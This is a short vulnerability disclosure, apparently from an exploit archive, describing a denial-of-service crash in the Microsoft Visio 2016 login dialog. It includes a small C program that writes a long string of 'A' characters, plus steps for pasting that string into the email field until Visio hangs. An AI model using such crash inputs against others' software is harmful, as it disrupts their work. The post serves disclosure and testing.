Microsoft Visio 2016 16.0.4738.1000 Denial Of Service

Microsoft Visio 2016 version 16.0.4738.1000 suffers from a denial of service vulnerability.


MD5 | 8d7282b2e6f1370e71dc0af9fb88fc7a

# -⋆- coding: utf-8 -⋆-
Created on Thu Feb 21 01:32:50 2019

@author: César
"""

#Exploit Title: Microsoft Visio 2016 (16.0.4738.1000) "Log in accounts" allows go on whit email formed by one thousand A in every of its parts [email protected]
#Descovered by: César Adrián Coronado Llanos
#Descovered Date; Sun Feb 17 20:34:23 2019
#Vendor Homepage: https://www.microsoft.com
#Tested Version: 16.0.4738.1000 x64
#Tested on OS: Microsoft Windows 10 Home Single Language x64
#Versión 10.0.10240 compilación 10240

#Steps to produce the crash
#1.- Run c code: generator.c
#2.- Open the file created "letters.txt" and copy the text content to clipboard
#3.- Open Visio 2016
#4.- Click in change account or Login
#5.- In the Login paste the clipboard, typewrite @ paste again the clipboard, typewrite . and paste for last time the clipboard, clik in next
#6.- Click in professional account
#7.- Visio 2016 don't respond, however it stays in a white window and don't send us any message

Note: For do this you need internet conection.

#include<stdio.h>
int main(){
int i;
FILE *letters;
if((letters = fopen("letters.txt","w+")) != NULL){
for(i=0;i<999;i++){
fprintf(letters,"A");
}
}
fclose(letters);
printf("\tThe file was created successfully!!\n");
}

Note: This code was compiled in dev C++

Related Posts